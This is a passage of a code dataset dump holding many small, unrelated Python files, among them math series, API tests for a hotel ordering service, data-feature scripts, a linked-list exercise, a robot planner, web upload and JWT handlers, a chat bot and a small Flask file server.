sum += ((4*(-1)**(k))/(2*k+1))\n    return(sum)\n\ndef e_sum(max=200):\n    fctrls = [factorial(s) for s in range(1,max)]\n    sum = 0\n    for k in range(max-1):\n        sum += 1.0/float(fctrls[k])\n    return(sum+1)\n\ndef pi_sum2(max=10000):\n    sum = 0\n    for k in range(1,max):\n        sum += 1.0/float(k*k)\n    return(sqrt(6*sum))\n    \ndef pi_sum3(max=10):\n    # Chudnovsky series: the linear coefficient is 545140134\n    sum=0\n    for k in range(max):\n        # sum += ((-1)**k*factorial(6*k)*(545140134*k+13591409)/(factorial(3*k)*(factorial(k))**3*(640320)**(3*k+1.5))\n        sum += (-1)**k*factorial(6*k)*(545140134*k+13591409)/(factorial(3*k)*((factorial(k))**3*(640320)**(3*k+1.5)))\n        # print((factorial(3*k)*((factorial(k))**3)))\n    return(1.0/12.0/float(sum))\n\nprint(\"Pi (Method 1): \"+str(pi_sum1())+\"\\n --- Number of iterations required: 10000\\n\")\nprint(\"Calculating e: \"+str(e_sum())+\"\\n --- Number of iterations required: 200\\n\")\nprint(\"Pi (Method 2): \"+str(pi_sum2())+\"\\n --- Number of iterations required: 10000\\n\")\nprint(\"Pi (Method 3): \"+str(pi_sum3())+\"\\n --- Number of iterations required: 10\\n\")","sub_path":"hello-world.py","file_name":"hello-world.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"460423899","text":"# -*- 
coding: utf-8 -*-\nimport requests, json,pytest,yaml,ddt\nfrom commen.test_r import read_yaml\nfrom commen.common import wm_url,wm_headers\n\n\n'''\n\nurl = domain ( wm_url() )\ndata = body\nheaders = headers ( wm_headers )\npytest --html=./report/微盟智慧酒店-接口自动化测试报告.html  specifies the report path\n\n\n'''\n\n\n@ddt.ddt\nclass Test_order:\n\n    # Lodging orders - room booking orders\n    @ddt.file_data(r'C:\\Users\\Public\\Desktop\\t1\\wm_test\\source\\test_queryHotelBookOrderList.yaml')\n    def test_queryHotelBookOrderList(self,**kwargs):\n\n        url = wm_url() + \"/pcaal/core/order/queryHotelBookOrderList\"\n        data = kwargs.get('testdata')  # fetch the test data\n        json_data = json.dumps(data)  # serialize to JSON\n        headers = wm_headers()\n\n        s = requests.post(url=url,data=json_data,headers=headers)\n        # token = json.dumps(s.text)\n        # token_k = json.loads(token)\n        # print(token_k)\n        # with open('C:/Users/Public/Desktop/t1/wm_test/source/token.yaml',\"w\",encoding=\"utf-8\") as f:\n        #     yaml.dump(token_k,f,Dumper=yaml.RoundTripDumper,allow_unicode=True,width=1000)\n\n        result = json.loads(s.text) # parse the response into a dict\n        a = result[\"errmsg\"] # actual result\n        assert \"处理成功\" in a\n        print(\"执行订房订单查询\")\n\n# Lodging orders - stay records\n    def test_queryHotelCheckInRecordList(self):\n        url = wm_url() + \"/pcaal/core/order/queryHotelCheckInRecordList\"\n        data = read_yaml(\"test_queryHotelCheckInRecordList.yaml\")\n        headers = wm_headers()\n        s = requests.post(url=url,data=data,headers=headers)\n        #print(s.text)\n        result = json.loads(s.text)\n        a = result[\"errmsg\"]\n        assert \"处理成功\" in a\n\n        print(\"执行住宿记录查询\")\n\n# Mall orders - order records and reservation orders use the same endpoint\n    def test_queryGoodsOrderList(self):\n        url = wm_url() + \"/pcaal/core/order/queryGoodsOrderList\"\n        data = read_yaml(\"test_queryGoodsOrderList.yaml\")\n        headers = wm_headers()\n\n        s = requests.post(url=url,data=data,headers=headers)\n        #print(s.text)\n        result = json.loads(s.text)\n        a = result[\"errmsg\"]\n        assert \"处理成功\" in a\n\n        print(\"执行订单记录和预约订单查询\")\n\n# Mall orders - redemption records\n    def test_getVericationLogList(self):\n        url = wm_url() + \"/pcaal/core/usercode/getVericationLogList\"\n        data = read_yaml(\"test_getVericationLogList.yaml\")\n        headers = wm_headers()\n\n        s = requests.post(url=url, data=data, headers=headers)\n        #print(s.text)\n        result = json.loads(s.text)\n        a = result[\"errmsg\"]\n        assert \"处理成功\" in a\n        print(\"执行商城订单-核销记录查询\")\n\n# Mall orders - reservation records\n    def test_listBookRecord(self):\n        url = wm_url() + \"/pcaal/core/order/listBookRecord\"\n        data = read_yaml(\"test_listBookRecord.yaml\")\n        headers = wm_headers()\n\n        s = requests.post(url=url, data=data, headers=headers)\n        #print(s.text)\n        result = json.loads(s.text)\n        a = result[\"errmsg\"]\n        assert \"处理成功\" in a\n        print(\"执行商城订单-预约记录查询\")\n\n# Dine-in orders\n    def test_listCanteenOrder(self):\n        url = wm_url() + \"/pcaal/core/canteen/order/listCanteenOrder\"\n        data = read_yaml(\"test_listCanteenOrder.yaml\")\n        headers = wm_headers()\n\n        s = requests.post(url=url, data=data, headers=headers)\n        #print(s.text)\n        result = json.loads(s.text)\n        a = result[\"errmsg\"]\n        assert \"处理成功\" in a\n        print(\"执行堂食订单查询\")\n\n\n# Membership card activation orders\n    def test_queryMemberCardOrderList(self):\n\n        url = wm_url() + \"/pcaal/core/order/queryMemberCardOrderList\"\n        data = read_yaml(\"test_queryMemberCardOrderList.yaml\")\n        headers = wm_headers()\n\n        s = requests.post(url=url, data=data, headers=headers)\n        #print(s.text)\n        result = json.loads(s.text)\n        a = result[\"errmsg\"]\n        assert \"处理成功\" in a\n        print(\"执行会员卡开卡订单查询\")\n\n# After-sales orders\n    def test_getRefundOrderList(self):\n        url = wm_url() + \"/pcaal/core/order/getRefundOrderList\"\n        data = read_yaml(\"test_getRefundOrderList.yaml\")\n        headers = wm_headers()\n\n        s = requests.post(url=url, data=data, headers=headers)\n        #print(s.text)\n        result = json.loads(s.text)\n        a = result[\"errmsg\"]\n        assert \"处理成功\" in a\n        print(\"执行售后订单查询\")\n\n# After-sales settings query\n    def test_getAfterSaleSetting(self):\n        url = wm_url() + \"/pcaal/core/sharing/getAfterSaleSetting\"\n        data = read_yaml(\"test_getAfterSaleSetting.yaml\")\n        headers = wm_headers()\n\n        s = requests.post(url=url, data=data, headers=headers)\n        # print(s.text)\n        result = json.loads(s.text)\n        a = result[\"errmsg\"]\n        assert \"处理成功\" in a\n        print(\"执行售后设置查询\")\n\n# After-sales settings save endpoint\n    def test_addOrUpdateAfterSaleSetting(self):\n        url = wm_url() + \"/pcaal/core/sharing/addOrUpdateAfterSaleSetting\"\n        data = read_yaml(\"test_addOrUpdateAfterSaleSetting.yaml\")\n        headers = wm_headers()\n\n        s = requests.post(url=url, data=data, headers=headers)  # send the request\n        # print(s.text)\n        result = json.loads(s.text)\n        a = result[\"errmsg\"]\n        assert \"处理成功\" in a\n        print(\"执行售后设置保存\")\n\n# Deposit refund list\n    def test_getRefundPledgeOrderList(self):\n        url = wm_url() + \"/pcaal/core/order/getRefundPledgeOrderList\"\n        data = read_yaml(\"test_getRefundPledgeOrderList.yaml\")\n        headers = wm_headers()\n\n        s = requests.post(url=url, data=data, headers=headers)\n        # print(s.text)\n        result = json.loads(s.text)\n        a = result[\"errmsg\"]\n        assert \"处理成功\" in a\n        print(\"执行押金退款列表\")\n\n# Payment-code orders\n    def test_queryOrderListToB(self):\n        url = wm_url() + \"/pcaal/core/order/queryOrderListToB\"\n        data = read_yaml(\"test_queryOrderListToB.yaml\")\n        headers = wm_headers()\n\n        s = requests.post(url=url, data=data, headers=headers)\n        # print(s.text)\n        result = json.loads(s.text)\n        # print(result)\n        a = result[\"errmsg\"]\n        assert \"处理成功\" in a\n        print(\"执行收款码订单查询\")","sub_path":"wm_test/case/test_order.py","file_name":"test_order.py","file_ext":"py","file_size_in_byte":6448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"411335403","text":"# -*- coding: utf-8 -*-\n# @Date    : 2018-06-20 14:46:02\n# @Author  : GEFE (gh_efe@163.com)\n# @Version : 1.0.0\n# @Describe : compute the probability of each evt3 class and merge the evt3 features by those probabilities\n\n\nimport numpy as np\nimport pandas as pd\n\n# common_path = r'~/Documents/Study/Python/merchants_bank'\ncommon_path = r'~/Documents/merchants_bank'\n# train\n# input\ntrain_usrid_evt3_path = common_path + r'/data/feature/train_usrid_evt3.csv'\n\n# train_usrid_evt3_flg_path = common_path + r'/data/feature/train_usrid_evt3_flg.csv'\n# output\ntrain_usrid_merge_evt3_path = common_path + r'/data/feature/train_usrid_merge_evt3.csv'\n\n# test\n# input\ntest_usrid_evt3_path = common_path + r'/data/feature/test_usrid_evt3.csv'\n\n# test_usrid_evt3_flg_path = common_path + r'/data/feature/test_usrid_evt3_flg.csv'\n# output\ntest_usrid_merge_evt3_path = common_path + r'/data/feature/test_usrid_merge_evt3.csv'\n\ntemp_path = common_path + r'/data/feature/temp.csv'\ndef count_evt3_proba():\n    # compute the evt3 weights\n    sum_evt3_count = 0\n    train_evt3_df = pd.read_csv(train_usrid_evt3_path)\n    test_evt3_df = pd.read_csv(test_usrid_evt3_path)\n    # df = pd.read_csv(train_usrid_evt3_flg_path)\n    both_evt3_df = pd.concat([train_evt3_df, test_evt3_df], axis=0)\n    both_evt3_df.pop('USRID')\n    for ele in both_evt3_df.columns:\n        # print(ele)\n        sum_evt3_count += sum(list(both_evt3_df[ele]))\n        # print(sum_evt3_count)\n        # break\n    print(sum_evt3_count)\n\n    evt3_proba = []\n    # count = 0\n    for ele in both_evt3_df.columns:\n        evt3_count = sum(list(both_evt3_df[ele]))\n        ele_evt3_proba = evt3_count/sum_evt3_count\n        # if ele_evt3_proba < 0.00001:\n        #     print(count)\n        #     count += 1\n        # 
print(ele_evt3_proba)\n # ele_evt3_proba = 0\n evt3_proba.append(ele_evt3_proba)\n \n # print('len evt3_proba', len(evt3_proba))\n # evt3_proba_df = pd.DataFrame(evt3_proba)\n # print('evt3_proba ',evt3_proba_df[:10])\n # evt3_proba_df.to_csv(temp_path)\n return evt3_proba\n\ndef sum_evt3_def(usrid_evt3_path, save_path):\n df = pd.read_csv(usrid_evt3_path)\n # print('df', df.shape)\n df_usrid = df['USRID']\n df.pop('USRID')\n print('df shape is ', df.shape)\n evt3_proba = count_evt3_proba()\n print('权值计算成功')\n merge_evt3 = []\n for ele in df.as_matrix():\n sum_evt3 = 0\n for x,j in zip(ele, evt3_proba):\n sum_evt3 += x * j\n merge_evt3.append(sum_evt3)\n # print(merge_evt3[:10])\n merge_evt3_df = pd.DataFrame(merge_evt3, columns=['MERGE_EVT3'])\n merge_evt3_df = pd.concat([df_usrid, merge_evt3_df],axis=1)\n merge_evt3_df.to_csv(save_path, index=0)\n print('保存成功')\n\nif __name__ == '__main__':\n # count_evt3_proba()\n sum_evt3_def(train_usrid_evt3_path, train_usrid_merge_evt3_path)\n sum_evt3_def(test_usrid_evt3_path, test_usrid_merge_evt3_path)\n print('结束')\n \n ","sub_path":"feature/merge_evt3.py","file_name":"merge_evt3.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"310312984","text":"class ListNode:\n def __init__(self, x, next=None):\n self.val = x\n self.next = next\n\n\nclass Solution:\n def rotateRight(self, head: ListNode, k: int) -> ListNode:\n if not head or not head.next:\n return head\n length = self.length(head)\n if int(k % length) == 0:\n return head\n k = length - int(k % length)\n\n dummy = ListNode(-1)\n dummy.next = head\n parent = dummy\n current = head\n while current:\n if 0 == k:\n dummy.next = current\n parent.next = None\n\n parent = current\n current = current.next\n k = k - 1\n parent.next = head\n return dummy.next\n\n def length(self, root):\n length = 0\n while root:\n length = length + 1\n root = root.next\n return length\n\n\n# root = ListNode(1, ListNode(2, ListNode(3, ListNode(4, ListNode(5)))))\nroot = ListNode(0, ListNode(1, ListNode(2)))\nprint(Solution().length(root))\nresult = Solution().rotateRight(root, 4)\nprint(result)\n\n","sub_path":"rotate_list.py","file_name":"rotate_list.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"528894002","text":"import color_obj\nimport math\n\n#defines the state of the robot\nclass robot:\n \n #data describing the current state of the robot\n def __init__(self, my_coords, objects, my_quad):\n self.coords = my_coords\n self.objs = objects\n self.quadrant = my_quad\n\n #returns the angle with respect to the center\n def angle(self):\n return math.atan2(self.coords[1]-50, self.coords[0]-50)\n\n #returns distance from center\n def radius(self):\n return math.hypot(self.coords[0]-50, self.coords[1]-50)\n\n #changes the color quadrant to the next one\n def next_quad(self):\n if self.quadrant == 3: self.quadrant = 0\n else: self.quadrant += 1\n\n #returns blocks the robot is carrying\n def objs_held(self):\n held = []\n for b in self.objs:\n if b.retrieved: held.append(b)\n return held\n\n #returns blocks the robot could potentially target\n #must be target color, spotted, not retrieved, and not sorted\n def target_objs(self):\n targets = []\n for b in self.objs:\n if (b.color==self.quadrant) and b.spotted and (not b.retrieved) and (not b.sort):\n targets.append(b)\n return targets\n\n #sorts objects based on given 
attribute, low to high\n #only returns a list of targets if targets_only = True\n #attributes are distance and angle as of now\n def attr_sort(self, attribute, targets_only=True):\n if targets_only: objects = self.target_objs()\n else: objects = self.objs\n if attribute == 'distance':\n return sorted(objects, key=lambda x: x.dist(self.coords))\n elif attribute == 'angle':\n return sorted(objects, key=lambda x: x.angle_WRT_robot(self.coords))\n elif attribute == 'spotted':\n attr = []\n for o in objects:\n if o.spotted == True: attr.append(o)\n return attr\n\n #decides which object to go to next\n def next_obj(self):\n corners = [(5, 5), (95, 5), (95, 95), (5, 95)]\n if len(self.objs_held())==3: return corners[self.quadrant]\n elif len(self.attr_sort('spotted')) == 0:\n next_angle = self.angle() + math.pi/8\n if self.radius() < 15: rad = self.radius() + 5\n elif self.radius() > 50: rad = self.radius() - 30\n else: rad = self.radius()\n return (rad*math.cos(next_angle)+50, rad*math.sin(next_angle)+50)\n elif self.attr_sort('distance')[0].dist(self.coords)<10: return self.attr_sort('distance')[0]\n else: return self.attr_sort('angle')[0]\n\n #run-through that gets objects\n #mostly for testing, since actual parameters shifts are triggered by inputs\n def four_loops(self):\n goals = []\n for n in range(0, 4):\n while type(self.next_obj()) is not tuple:\n target = self.next_obj()\n self.next_obj().retrieved = True\n self.coords = target.coords\n goals.append(target.coords)\n goals.append(self.next_obj())\n self.coords = self.next_obj()\n for o in self.objs_held():\n o.sort = True\n o.retrieved = False\n self.next_quad()\n goals.append((5, 5))\n return goals\n\n #the idea here is that the robot outputs the immediate next location\n def next_step(self):\n target = next_obj()\n\n#testing the robot class\n\"\"\"\nimport matplotlib.pyplot as plt\nfrom matplotlib.path import Path\nimport matplotlib.patches as patches\nimport numpy\nimport math\n\nstuff = [color_obj.color_obj((8, 10), 0, True, False, False)]\nstuff.append(color_obj.color_obj((18, 10), 0, True, False, False))\nstuff.append(color_obj.color_obj((16, 37), 0, True, True, False))\nstuff.append(color_obj.color_obj((5, 94), 1, True, False, False))\nstuff.append(color_obj.color_obj((65, 37), 1, True, False, False))\nstuff.append(color_obj.color_obj((5, 17), 1, True, False, False))\nstuff.append(color_obj.color_obj((4, 38), 2, True, False, False))\nstuff.append(color_obj.color_obj((5, 31), 2, True, False, False))\nstuff.append(color_obj.color_obj((46, 37), 2, True, False, False))\nstuff.append(color_obj.color_obj((19, 91), 3, True, False, False))\nstuff.append(color_obj.color_obj((76, 37), 3, True, False, False))\nstuff.append(color_obj.color_obj((6, 37), 3, True, False, False))\nJJ = robot((3, 3), stuff, 0)\n\nplt.plot([JJ.coords[0]], [JJ.coords[1]], 'k+')\npoint_colors = ['bo', 'go', 'ro', 'yo']\nfor n in range(0, 4):\n xx = [o.coords[0] for o in JJ.objs[3*n:3*n+3]]\n yy = [o.coords[1] for o in JJ.objs[3*n:3*n+3]]\n plt.plot(xx, yy, point_colors[n])\nplt.plot([8*math.cos(x)+50 for x in numpy.arange(0, 6.35, math.pi/2)], [8*math.sin(y)+50 for y in numpy.arange(0, 6.35, math.pi/2)])\nplt.xlim([0, 100])\nplt.ylim([0, 100])\nplt.show()\n\"\"\"\n","sub_path":"robot_2019.py","file_name":"robot_2019.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"3656568","text":"from sqlalchemy import (create_engine, MetaData, Column,\n Table, Integer, 
String)\n\nengine = create_engine('sqlite:///enderecos.db',\n                       echo=True)\n\nmetadata = MetaData(bind=engine)\n\nendereco_table = Table('endereco', metadata,\n                       Column('id', Integer, primary_key=True),\n                       Column('CEP', Integer, index=True),\n                       Column('Rua', String(100)),\n                       Column('Numero', Integer),\n                       Column('Complemento', String(40)))\n\nmetadata.create_all()","sub_path":"with_SQLAlchemy/Database/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"316233192","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef sigmoid(x):\n    return 1 / (1 + np.exp(-x))\n\n# define x as a vector of values running from -5 to 5\n# in steps of 0.5, i.e. x = {-5 , -4.5, -4, -3.5, …\nx = np.arange(-5, 5, 0.5)\n\nprint(x)\nprint(type(x))\n\nsig = sigmoid(x)\nsig = np.array(sig)\nprint(sig)\nprint(type(sig))\n\nplt.plot(x, sig,\n         color=\"g\",\n         marker=\"o\",\n         linestyle=\":\")\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.title(\"Função Sigmóide\")\nplt.grid()\nplt.savefig(\"plot_funcao_sigmoide_example.png\")\nplt.show()\n\n","sub_path":"05_graficos_matlibplot/06_a_funcao_sigmoidal_example.py","file_name":"06_a_funcao_sigmoidal_example.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"296993337","text":"__author__ = 'weizheng'\n\nimport tornado.web\n\nfrom theme_manager import ThemeManager\nfrom account_manager import AccountManager\nfrom response_message import ReponseMessage\nimport os\n\nREQUEST_ARGUMENT_ACCOUNT_ID = \"account_id\"\nREQUEST_ARGUMENT_AUTH_TOKEN = \"auth_token\"\nREQUEST_ARGUMENT_THEME_CONTENT = \"theme_content\"\n\nclass ThemeUploadHandler(tornado.web.RequestHandler):\n    def __init__(self, *args, **kwargs):\n        # tornado instantiates handlers with (application, request, **kwargs)\n        self.theme_manager = None\n        self.account_manager = None\n        super(ThemeUploadHandler, self).__init__(*args, **kwargs)\n\n    def initialize(self, database_engine):\n        self.theme_manager = ThemeManager(database_engine)\n        self.account_manager = AccountManager(database_engine)\n\n    # post arguments:\n    # localhost:port/upload?account_id=***&&auth_token=***\n    # theme_info is added in self.request.files[\"theme_content\"]\n    def post(self):\n        account_id = self.get_argument(REQUEST_ARGUMENT_ACCOUNT_ID)\n        auth_token = self.get_argument(REQUEST_ARGUMENT_AUTH_TOKEN)\n\n        file_metas = self.request.files[\"theme_content\"]\n        upload_path = \"./\"\n        for meta in file_metas:\n            file_name = meta['filename']\n            file_path = os.path.join(upload_path, file_name)\n            with open(file_path, 'wb') as up:\n                up.write(meta['body'])\n        #self.theme_manager.record_theme()\n        response_msg = ReponseMessage()\n        self.write(response_msg)","sub_path":"src/service_share_theme/theme_upload_handler.py","file_name":"theme_upload_handler.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"153568334","text":"# from rest_framework.decorators import api_view\nfrom django.http.response import JsonResponse\nfrom user.models import User\nfrom django.conf import settings\nimport jwt\n# from rest_framework.authentication import BaseAuthentication\nfrom rest_framework import exceptions\nfrom functools import wraps\n\n# class MyAuthentication(BaseAuthentication):\ndef create_token(id, email):\n    try:\n        token = jwt.encode({'user_id':id, 'user_email':email}, settings.SECRET_KEY, algorithm='HS256')\n        return token\n    except Exception:\n        return JsonResponse({'error' : 'error 
creating token'})\n\n\ndef authenticate(function):\n    @wraps(function)\n    def wrapper_function(*args, **kwargs): \n        try:\n            request = args[0].request\n            encoded_token = request.headers['Token']\n            decoded_token = jwt.decode(encoded_token, settings.SECRET_KEY, algorithms=['HS256'])\n            # return JsonResponse({'id':decoded_token['user_id'], 'email':decoded_token['user_email']})\n            # print(decoded_token['user_email'])\n            return function(*args, **kwargs)\n        except Exception as e:\n            # print(str(e.__dict__))\n            raise exceptions.AuthenticationFailed('invalid token')\n    return wrapper_function","sub_path":"requirements/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"180343125","text":"\"\"\"Simple Bot to edit Bale messages.\"\"\"\n\nimport asyncio\n\nfrom balebot.filters import DefaultFilter, TextFilter\nfrom balebot.models.messages import TextMessage\nfrom balebot.updater import Updater\nfrom balebot.utils.logger import Logger\n\n# Bale Bot Authorization Token\n\nupdater = Updater(token=\"PUT YOUR TOKEN HERE\",\n                  loop=asyncio.get_event_loop())\n# Define dispatcher\ndispatcher = updater.dispatcher\nmy_logger = Logger.get_logger()  # Create a logger and name it my_logger\n\n\n# Both of success and failure functions are optional\n\ndef success_send_message(response, user_data):\n    kwargs = user_data['kwargs']\n    update = kwargs[\"update\"]\n    user_peer = update.get_effective_user()\n    my_logger.info(\"Your message has been sent successfully.\", extra={\"user_id\": user_peer.peer_id, \"tag\": \"info\"})\n\n\ndef failure_send_message(response, user_data):\n    kwargs = user_data['kwargs']\n    update = kwargs[\"update\"]\n    user_peer = update.get_effective_user()\n    my_logger.error(\"Sending message has been failed\", extra={\"user_id\": user_peer.peer_id, \"tag\": \"error\"})\n\n\nrequest_random_id = None\n\n\n@dispatcher.command_handler(commands='/start')\ndef start(bot, update):\n    message = TextMessage('*Hello this message will be edited when you send /edit command*')\n    # Send a message to client\n    request = bot.respond(update, message, success_callback=success_send_message, failure_callback=failure_send_message)\n    global request_random_id\n    request_random_id = request.get_json_object()['body']['randomId']\n    print(request_random_id)\n\n\n@dispatcher.command_handler(commands='/edit')\ndef edit(bot, update):\n    user_peer = update.get_effective_user()\n    message = TextMessage('*message edited*')\n    # edit the previously sent message for the client\n    bot.edit_message(message=message, user_peer=user_peer, random_id=request_random_id,\n                     success_callback=success_send_message, failure_callback=failure_send_message)\n\n\n# Run the bot!\nupdater.run()\n","sub_path":"examples/simple_edit_message.py","file_name":"simple_edit_message.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"617287756","text":"# coding: utf-8\nfrom soccersimulator import Strategy, SoccerAction, Vector2D, SoccerTeam, Simulation, show_simu, math\nfrom soccersimulator import settings\nimport tools\n\nclass RandomStrategy(Strategy):\n    def __init__(self):\n        Strategy.__init__(self, \"Random\")\n\n    def compute_strategy(self, state, id_team, id_player):\n        # id_team is 1 or 2\n        # id_player starts at 0\n        return SoccerAction(Vector2D.create_random(),Vector2D.create_random())\n\nclass joueur_fonceur(Strategy):\n    def __init__(self):\n        Strategy.__init__(self,\"Fonceur\")\n        
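\n    # rush toward the ball and, once it is within BALL_RADIUS, shoot at the middle of the goal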
\n def compute_strategy(self, state, id_team, id_player):\n s=SuperState(state,id_team,id_player)\n i=s.goal.x\n if s.norme>BALL_RADIUS:\n return SoccerAction((s.ball-s.player),Vector2D())\n return SoccerAction((s.ball-s.player),Vector2D(i,GAME_HEIGHT/2)-s.player)\n \nclass joueur_attaquant(Strategy):\n def __init__(self):\n Strategy.__init__(self, \"Attaquant\")\n \n def compute_strategy(self, state, id_team, id_player):\n s=SuperState(state,id_team,id_player)\n i=s.goal.x\n if s.norme>SHORT_RANGE:\n return SoccerAction((s.ball+s.vball*10-s.player).normalize()*maxPlayerAcceleration,Vector2D())\n if s.norme>BALL_RADIUS:\n return SoccerAction((s.ball-s.player),Vector2D())\n if (s.player.xGAME_WIDTH/2 and s.id_team==2):\n if s.eprocheGAME_WIDTH/2-1: \n return SoccerAction((Vector2D(GAME_WIDTH/5,GAME_HEIGHT/2)-s.player),Vector2D())\n if id_team==2:\n if s.ball.x\n \n

YO

\n \n \n \"\"\"\n\n\n@app.route('/push', methods=['POST'])\ndef push():\n pb_file = request.files['pbfile']\n if pb_file is None:\n return redirect('/')\n pb_file.save(f'test/server/{pb_file.filename}')\n return response_builder()\n\n\n@app.route('/pull/', methods=['GET'])\ndef pull(file):\n \"\"\"\n I saw [https://stackoverflow.com/questions/30505408/what-is-the-correct-protobuf-content-type]\n to decide MIME TYPE.\n :param file:\n :return:\n \"\"\"\n file_path = pathlib.Path(app.config['MODEL_DIRECTORY']) / pathlib.Path(file)\n if not file_path.exists():\n return response_builder(status_code=404, message='File Not Found')\n\n return send_file(str(file_path), mimetype='application/protobuf')\n\n\n@app.route('/exit')\ndef shut_down():\n shutdown_server()\n return 'shutting down'\n\n\ndef shutdown_server():\n \"\"\"\n see [http://flask.pocoo.org/snippets/67/]\n :return:\n \"\"\"\n func = request.environ.get('werkzeug.server.shutdown')\n if func is None:\n raise RuntimeError('Not running with the Werkzeug Server')\n func()\n\n\ndef response_builder(status_code=200, message=None):\n return Response(status=status_code, response=message)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=9999)\n","sub_path":"route1/TestServer.py","file_name":"TestServer.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"369777870","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 30 14:20:21 2019\n\n@author: ckielasjensen\n\"\"\"\nimport numpy as np\n# stateData(input_state, bezopt)\n# SLData((endTime-startTime, results))\n# KNNData((endTime-startTime, results))\n# DNNData((endTime-startTime, results))\n\nSLTimes = np.array([i[0] for i in SLData])\nKNNTimes = np.array([i[0] for i in KNNData])\nDNNTimes = np.array([i[0] for i in DNNData])\n\nallTimes = [SLTimes, KNNTimes, DNNTimes]\nstrTimes = ['Straight Line Guess', 'KNN Guess', 'DNN Guess']\n\nprint(f'Length of the test data: {len(SLTimes)}')\n\nprint(' MIN | MEAN | MAX | STD')\nfor i, t in enumerate(allTimes):\n msg = (f'{t.min():.3f} | {t.mean():.3f} | {t.max():.3f} | {t.std():.3f}'\n f' --- {strTimes[i]}')\n print(msg)\n \nBestKNN = [val-KNNTimes[i] for i, val in enumerate(SLTimes) if val > KNNTimes[i]]\nBestDNN = [val-DNNTimes[i] for i, val in enumerate(SLTimes) if val > DNNTimes[i]]\n\nprint(f'Number of times KNN was better: {len(BestKNN)}')\nprint(f'Average better time: {np.mean(BestKNN)}')\n\nprint(f'Number of times DNN was better: {len(BestDNN)}')\nprint(f'Average better time: {np.mean(BestDNN)}')","sub_path":"AnalyzeTimingData.py","file_name":"AnalyzeTimingData.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"278046302","text":"import glob\nimport os\nimport string\n\nimport enchant\nfrom collections import OrderedDict\nimport numpy as np\nimport pandas as pd\n\nfrom chars import CharDict\nfrom words import WordDict\n\ndef lookup_dictionary(s, dictionary=WordDict):\n ## 1 : In dictionary, include it. 
Do not split\n    ## 0 : In dictionary but exclude it.\n    ## -1 : Not in dictionary.\n    \n    if s == '':\n        return 0\n    \n    ## English check\n    enchantment = enchant.Dict(\"en_US\")\n    is_english = enchantment.check(s)\n    \n    if s in dictionary.INCLUDING_WORDS or is_english:\n        return 1\n    if s in dictionary.EXCLUDING_WORDS:\n        return 0\n    ## anything else is unknown\n    return -1\n    \ndef remove_duplicates(seq):\n    seen = set()\n    seen_add = seen.add\n    return [x for x in seq if not (x in seen or seen_add(x))]\n\ndef flatten(_iterable):\n    if isinstance(_iterable, list):\n        return [a for i in _iterable for a in flatten(i)]\n    else:\n        return [_iterable]\n\ndef split_scriptiocontinua(s):\n    # wordninja is only used here, so import it locally\n    import wordninja\n    lookup_result = lookup_dictionary(s)\n    if lookup_result == 1:\n        return s\n    elif lookup_result == 0:\n        return ''\n    else:\n        return ' '.join(wordninja.split(s))\n    \ndef handle_numerals(s, dictionary=WordDict):\n    if s in dictionary.INCLUDING_WORDS:\n        return s\n    else:\n        for num in range(10):\n            s = s.replace(str(num), '')\n        return s\n\ndef is_fully_printable(s):\n    return all([i in string.printable for i in s])\n\ndef replace_chars(s, dictionary=CharDict):\n    ## Replace punctuation\n    s = \"\".join(list(map(lambda x: dictionary.PUNCTUATION_REPLACEMENT_DICT.get(x, x), s)))\n    \n    ## Replace letters\n    s = \"\".join(list(map(lambda x: dictionary.LETTER_REPLACEMENTS_DICT.get(x, x), s)))\n    return s\n\ndef strip_brackets(s, brackets=[('(', ')'), ('{', '}'), ('[', ']')]):\n    ## collect the text between the first occurrence of each bracket pair\n    contents = []\n    for bracket_pair in brackets:\n        p1, p2 = bracket_pair\n        if p1 in s and p2 in s:\n            contents.append(s[s.find(p1) + 1:s.find(p2)])\n    \n    return contents\n\n# brackets=[('(', ')'), ('{', '}'), ('[', ']')]\ndef extract_words(s, delimiter='@@@'):\n    for punct in string.punctuation:\n        s = s.replace(punct, delimiter)\n    \n    tokens = s.split(delimiter)\n    tokens = remove_duplicates(tokens)\n\n    tokens = list(map(lambda s: s.strip(), tokens))\n    tokens = list(filter(lambda s: s not in string.punctuation, tokens))\n    \n    return tokens\n\nif __name__ == \"__main__\":\n\n    IMAGES_DIR = \"./images/\"\n    INPUT_METADATA_FILE = \"./metadata.txt\"\n    OUTPUT_LABELS_FILE = \"./labels.txt\"\n    DELIMITER = ','\n\n    if os.path.isfile(OUTPUT_LABELS_FILE):\n        print(OUTPUT_LABELS_FILE, 'exists. 
